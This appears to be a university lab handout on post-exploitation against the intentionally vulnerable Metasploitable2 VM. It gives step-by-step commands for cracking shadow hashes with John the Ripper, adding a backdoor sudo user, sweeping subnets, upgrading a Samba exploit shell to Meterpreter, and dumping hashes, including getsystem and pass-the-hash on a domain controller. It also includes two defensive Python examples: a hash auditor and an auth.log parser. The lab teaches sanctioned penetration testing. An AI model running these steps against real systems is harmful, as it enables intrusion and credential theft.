Post-Exploitation – Lab

Hacking 101 Post-Exploitation

Prereq – Have a local instance of Kali running and finish the Metasploit lab.

https://hack.technoherder.com/vm-setup-kali-metasploitable2/

https://hack.technoherder.com/metasploit-2/

Part 1 – John the Ripper

Let’s say you have password hashes from an earlier exploit (such as the password hashes obtained in the Metasploit Lab). While that was helpful by itself to see what usernames exist, it would be much more useful to have plaintext passwords, which could then be used to log onto other unexploited systems. How can password hashes be converted to plaintext passwords?

John the Ripper is a password “security auditing and password recovery” tool that can also be used for brute force password cracking from hashes. This process can be much faster than network-based attacks that were tried previously with Hydra.  There’s no network delay waiting for the target response, no need to worry about overloading the target or setting off security alarms, and the hashing attempts can be heavily parallelized.

Run John the Ripper on the hashes you swiped from Metasploitable2. (Recall that back in Lab 5 you swiped the /etc/passwd and /etc/shadow files and then used the unshadow tool to merge those files into a single file.)  John the Ripper has a bunch of rules for common password permutations based on usernames – maybe some of those will hit?  Start with the SINGLE CRACK rule. This is for idiot passwords based on the login/GECOS information, but you might get lucky, and it’s super fast to start with.

# Just to see all the different permutations possible
$ john --list=rules   
$ john --single metasploitable_logins.txt

Note that you don’t have to provide a file in the “shadow” format – John the Ripper is perfectly capable of recognizing a wide variety of hash standards in a file with contents as simple as username:hash.
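John picks the algorithm from the crypt(3) prefix on each hash. The following is an added audit example, not part of the lab: it does the same classification over unshadow-style lines and flags the entries a defender would want to fix first, namely empty password fields and cheap algorithms (traditional DES, MD5-crypt) that a wordlist run finishes quickly against. The sample lines are constructed; the hashes are filler, not real Metasploitable2 values.

```python
import re

# crypt(3) prefixes -> algorithm; traditional DES hashes carry no prefix.
HASH_PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt",
                 "$2y$": "bcrypt", "$5$": "sha256crypt", "$6$": "sha512crypt",
                 "$y$": "yescrypt"}
# Algorithms cheap enough that a wordlist run like the one above finishes fast.
WEAK = {"des", "md5crypt"}

def identify_hash(field):
    """Classify the password field of one passwd/shadow-style line."""
    if field == "":
        return "empty"            # login requires no password at all
    if field.startswith(("!", "*")):
        return "locked"           # disabled account, nothing to crack
    for prefix, name in HASH_PREFIXES.items():
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "des"              # 13-char traditional DES crypt
    return "unknown"

def audit_unshadowed(text):
    """Parse username:hash:... lines (what unshadow emits and John reads)
    and report the algorithm plus a flag for entries worth remediating."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2 or line.startswith("#"):
            continue
        algo = identify_hash(fields[1])
        findings.append({"user": fields[0], "algorithm": algo,
                         "flag": algo in WEAK or algo == "empty"})
    return findings

# Constructed sample in the unshadow layout; the hashes are filler, not
# real Metasploitable2 values.
SAMPLE = """\
root:$1$aaaaaaaa$bbbbbbbbbbbbbbbbbbbbbb:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/bin/sh
guest::1001:1001:Guest:/home/guest:/bin/bash
alice:$6$cccccccc$dddddddddddddddddddddddddddddddddddddddddddd:1002:1002::/home/alice:/bin/bash
legacy:abJnggxhB/yWI:1003:1003::/home/legacy:/bin/sh
"""

if __name__ == "__main__":
    for f in audit_unshadowed(SAMPLE):
        print("FLAG" if f["flag"] else "ok  ", f["user"], f["algorithm"])
```

Run it against the real unshadow output from the lab and the same "FLAG" column tells you which accounts would have fallen to the wordlist run before you even start John.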

Deliverables:

  • What is the password of the ‘user’ user?
  • What is the password of the msfadmin user?
  • What is the password of the service user?

We’re making progress, but that didn’t guess passwords for all of the accounts.  Now run John the Ripper using a basic list of common passwords that ships with John.

$ john --wordlist=/usr/share/john/password.lst --rules metasploitable_logins.txt

Deliverables:

  • What is the password of the ‘sys’ user?
  • What is the password of the ‘klog’ user?

Note: John the Ripper is smart. If you re-run the command over the same input file, it won’t bother running the same tests or trying to find passwords for usernames that it already knows.  These are saved in ~/.john/john.pot.  So, you can easily try multiple wordlists (e.g. small, medium, large, MASSIVE) and more complicated rules (i.e. permutations) on the same hashes.

If you want to see all the results of the password cracking on the file, and not just the most recent scan, do:

# This will show results in the "passwd" format:
# username : password : UserID : GroupID : User Info : Home Directory : Default Shell
$ john --show metasploitable_logins.txt

Just the root password is left as a mystery…  I tried the 134MB rockyou.txt wordlist (uncompressed from /usr/share/wordlists/rockyou.txt.gz), but without success.  Some googling seems to indicate that this password is significantly harder to crack than the others.

Note that these are relatively short username and password lists, chosen so the lab runs quickly.  Metasploit comes with other files to choose from (see /usr/share/metasploit-framework/data/wordlists/) and any Pen Tester worth his or her salt will have their own curated password lists.

See Also: CrackStation.net has a 15GB (uncompressed) wordlist file:  https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm

You can keep track of these credentials in Metasploit using the creds command.  Add your best credential now (the msfadmin one, since we know it has sudo access) using the ‘creds add’ command.  You will need to specify the username, password, and IP address/port/protocol/service that the login is for.

# Ensure PostgreSQL database is running
$ sudo service postgresql start

# Launch Metasploit Console
$ msfconsole

# Continue using the workspace from the last lab:
msf6> workspace 178-metasploitable2

msf6> creds add user:msfadmin password:XXXXXX address:xx.xx.xx.xx port:22 protocol:tcp service-name:ssh

Then you can search the credentials database later, either by host or by service.

msf6> creds -s ssh
msf6> creds xx.xx.xx.xx

Part 2 – Useful Post-Exploit Activities

After gaining shell access, you may want to perform some common tasks, such as creating a user account for your own use (rather than needing to use a fragile exploit for access each time), or scanning the network for other hosts that may be investigated next.   This is referred to as enumeration.  (See:  Linux Enumeration Cheat Sheet)

Perform the following tasks on the Metasploitable2 VM via an exploit shell (any exploit will do). For each of these tasks, use only the software that is already present on the system.  You are not allowed to use apt to install anything on the system.

Deliverables:

  • For each task below, document each command or set of commands that you use.  Don’t be alarmed if the auto-grader isn’t aware (yet!) of all the diversity of commands possible here.

Tip: Feel free to just log onto Metasploitable2 and try these out at the terminal.  However, all of your answers must be runnable via the exploit shell, so test them at the end to make sure.

Warning:  The installed programs and configuration are different between your Kali Linux and Metasploitable2 Linux VMs.   Ensure that your commands actually work in the Metasploitable2 VM and accomplish the desired result!

Task 1: Grant Yourself Access: Get a list of all local users

Task 2: Grant Yourself Access: Get a list of all users with sudo access (i.e. root access).  Note that, in Metasploitable2, the relevant group is called “admin”, whereas in some other Linux distributions the relevant group is called “sudo”

Task 3: Grant Yourself Access: Create a new account with the username “tiger” and password “roar”

Task 4: Grant Yourself Access:  Grant the “tiger” account sudo permissions

Task 5: Revoke Access: Remove sudo permissions from “tiger”

Task 6: Revoke Access: Remove the user “tiger”

Task 7: Revoke Your Access: Remove the group “tiger”
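Tasks 3 through 7 all leave traces in the target’s auth.log, because the shadow-utils tools log every account and group change through syslog. The following is an added detection example, not part of the lab: it parses those messages into account-lifecycle events and marks the one that actually hands out root (a user being added to a sudo-capable group such as Metasploitable2’s “admin”) as high severity. The log lines are constructed in syslog layout; the host name and PIDs are made up.

```python
import re

# Groups whose membership grants root through sudo: Metasploitable2 uses
# "admin", newer Debian/Ubuntu use "sudo", Red Hat derivatives use "wheel".
PRIVILEGED_GROUPS = {"admin", "sudo", "wheel"}

# Regexes modeled on the syslog messages shadow-utils writes to auth.log.
PATTERNS = [
    ("user_created",       r"useradd\[\d+\]: new user: name=(?P<user>[^,]+),"),
    ("group_created",      r"useradd\[\d+\]: new group: name=(?P<group>[^,]+),"),
    ("added_to_group",     r"usermod\[\d+\]: add '(?P<user>[^']+)' to group '(?P<group>[^']+)'"),
    ("added_to_group",     r"gpasswd\[\d+\]: user (?P<user>\S+) added by \S+ to group (?P<group>\S+)"),
    ("removed_from_group", r"gpasswd\[\d+\]: user (?P<user>\S+) removed by \S+ from group (?P<group>\S+)"),
    ("user_deleted",       r"userdel\[\d+\]: delete user '(?P<user>[^']+)'"),
    ("group_deleted",      r"groupdel\[\d+\]: group '(?P<group>[^']+)' removed"),
]
COMPILED = [(action, re.compile(rx)) for action, rx in PATTERNS]

def parse_auth_log(text):
    """Extract account-lifecycle events from auth.log text. Severity is "high"
    only for additions to a sudo-capable group; unrelated lines are skipped."""
    events = []
    for line in text.splitlines():
        for action, rx in COMPILED:
            m = rx.search(line)
            if not m:
                continue
            d = m.groupdict()
            group = d.get("group")
            high = action == "added_to_group" and group in PRIVILEGED_GROUPS
            events.append({"ts": line[:15], "action": action, "user": d.get("user"),
                           "group": group, "severity": "high" if high else "low"})
            break          # one event per line
    return events

def privileged_grants(text):
    """Just the users who were put into a sudo-capable group."""
    return [e["user"] for e in parse_auth_log(text) if e["severity"] == "high"]

# Constructed sample in syslog layout; host name and PIDs are made up.
SAMPLE_LOG = """\
Mar  3 10:15:01 target useradd[4123]: new group: name=tiger, GID=1003
Mar  3 10:15:01 target useradd[4123]: new user: name=tiger, UID=1003, GID=1003, home=/home/tiger, shell=/bin/sh
Mar  3 10:16:40 target usermod[4130]: add 'tiger' to group 'admin'
Mar  3 10:30:12 target gpasswd[4142]: user tiger removed by root from group admin
Mar  3 10:31:05 target userdel[4150]: delete user 'tiger'
Mar  3 10:31:20 target groupdel[4155]: group 'tiger' removed
Mar  3 10:32:00 target sshd[4160]: Accepted password for msfadmin from 10.0.0.5 port 51234 ssh2
"""
```

After finishing Tasks 3 through 7 on the VM, feed its real /var/log/auth.log to parse_auth_log and compare the event sequence with the commands you ran; the "high" event is the one an alert should fire on.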

Task 8: Find out what shell you are running in via the exploit

Task 9: Do a network scan to detect other active hosts within a specific subnet that respond to ICMP pings. The intent in a pentest would be to scan inside the corporate network from your pivot machine. But since we don’t have a virtual network at the moment, we’re going to use a Pacific subnet instead.  For testing, use either the 138.9.110.0/24 subnet (when off-campus) or 10.10.4.0/24 subnet (when on-campus). Note that you are not allowed to use nmap for this, since Nmap won’t be installed on many exploited systems.

Tip: This may be easier to write as a tiny shell script rather than a fancy one-line command…

Task 10: Do a reverse DNS scan to find the hostnames for other hosts within the subnet you used above (either 138.9.110.0/24 or 10.10.4.0/24). The intent in a pentest would be to scan inside the corporate network from your pivot machine. But since we don’t have a virtual network at the moment, we’re using this Pacific subnet instead.  Note that you are not allowed to use nmap for this, since Nmap won’t be installed on many exploited systems.

Tip: This may be easier to write as a tiny shell script rather than a fancy one-line command…

Part 3 – Meterpreter

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Let’s upgrade our shell with Meterpreter!

Reference: Upgrade a Normal Command Shell to a Metasploit Meterpreter

Continue using the workspace from the last lab:

msf6> workspace 178-metasploitable2

Use the Samba exploit from the last lab:

msf6> search type:exploit name:samba
msf6> use exploit/multi/samba/usermap_script
msf6> info
msf6> set RHOST xx.xx.xx.xx

What payloads are available for this exploit?

msf6> show payloads

Hmmm, no Meterpreter available.  Well, let’s achieve it via a two-step process.  You can leave the payload as automatically selected here.

msf6> exploit
whoami
root

Now that you have a shell on the Metasploitable2 VM, send it to the background via CTRL-Z and enter y to put it in the background

Search for a post-exploit script to upgrade a shell to a Meterpreter shell, and then select it.

msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter

Learn more about this post-exploit script and the options it needs set:

msf6> info

Of the options that this post-exploit script takes, the only missing one (that is required) is SESSION, which is the session to run this script on.  What are our current sessions?  (Should only be one, the one we just sent to the background)

# where x = num of session you just backgrounded
msf6> sessions
msf6> set SESSION x    

Run this post-exploit script

# Exploit runs...
msf6> exploit

To use the new Meterpreter shell, get the list of sessions again. You should see a new session.

msf6> sessions

Deliverables:

  • What is the “type” listed for this new session?
  • What username is meterpreter running as on the remote system?
  • What does that username mean in terms of our access to this system?

To interact with this new shell, use the “-i” flag for sessions:

# where x = num of Meterpreter session you just created
msf6> sessions -i x        

Let’s explore the capabilities of Meterpreter now that it’s running on the Metasploitable2 VM.

View the help menu

meterpreter>  ?

Obtain some high level information about the system Meterpreter is running on:

meterpreter> sysinfo

Deliverables:

  • What is the OS reported?
  • What is the (processor) architecture reported?

Browse the list of running processes to get a sense of what is running on the system.

meterpreter> ps

Deliverables:

  • What is the process ID of Xtightvnc? (A VNC server)

Download the /etc/passwd and /etc/shadow files from Metasploitable2 to your Kali machine and save them in the /tmp directory, thus demonstrating yet another way to access files on the remote host.

meterpreter> download /etc/passwd /etc/shadow /tmp

Note: There’s an UPLOAD command too!

Snoop through the ARP cache of the target host. This represents other systems on the local area network that the target has been in recent communication with. You might discover other systems worth examining next.

meterpreter> arp

To exit the meterpreter shell:

meterpreter> quit

Keep your original exploit shell running a little while longer…

Deliverables:

  • What are the contents of the ARP cache? (Copy and paste in the table)

Part 4 – Post-Exploit Script

Metasploit has a number of “post-exploit” scripts that can be useful for data gathering purposes.  What other post-exploit scripts exist for our Linux target?

msf6> search type:post platform:linux

Some (many?) of these look interesting, depending on what applications you think are running on the target system:

# ANOTHER way to get those password hashes
msf6> info post/linux/gather/enum_system
msf6> info post/linux/gather/enum_users_history
msf6> info post/linux/gather/hashdump     

Deliverables:

  • Use the hashdump post-exploit script to access the password hashes.  (Tip: Does it require any environment variables to be set before running?)  Where does the “unshadowed password file” get downloaded to on your local Kali system?
  • Use the enum_system post-exploit script to access installed packages and services, log files, cron jobs, and other interesting system artifacts. What is the package version of the Apache Tomcat 5.5 engine that is installed?  (According to the Ubuntu/Debian package manager labeling)
  • Use the enum_users_history post-exploit script to access shell history, command history for various SQL servers, and the sudoers file, among other artifacts. What is the name of the configuration file that the “postgres” user edited using the “vim” text editor?  (There are two files, either is acceptable)

Tip: Forget which artifact file contains what information?  Do you want to see them in an organized list, preferably sorted/searchable by host?  These scripts have been saving that information for you automatically.

msf6> loot

To exit your original exploit shell:

# Where x = num of your original exploit
msf6> sessions
msf6> sessions -i x
CTRL-C, followed by 'y' when prompted to Abort Session?

Post-Exploit – (Extra notes, different lesson…)

Now that you have initial access to the system, take advantage of it.

Upgrade your shell to Meterpreter.

# Where <num> is session you JUST backgrounded
msf6> search shell_to_meterpreter
msf6> use post/multi/manage/shell_to_meterpreter
msf6> options
msf6> set SESSION <num>   
msf6> exploit   
# Should see "Meterpreter session <num> opened"
msf6> sessions

Take a screenshot at this point as a deliverable.

Connect to that active Meterpreter session on the domain controller.

# Where <num> is NEW meterpreter session
msf6> sessions -i <num>   

There’s lots of fun things to do here!

# Where am I running?  Should be domain controller
meterpreter>  sysinfo    

# See what permissions we have
meterpreter>  getprivs   

# Process list
meterpreter>  ps         

# Ensure we're escalated to SYSTEM access, if not already
meterpreter>  getsystem 

# Migrate to another process - Look for vds.exe and use its PID
meterpreter>  migrate <pid>  

# Dump hashes for cracking
meterpreter>  hashdump

These password hashes are perfect for brute forcing, and are also useful for Windows pass-the-hash attacks (where you don’t need the original password, just the hash will suffice).

Background the meterpreter shell on the domain controller:  CTRL-Z, then y
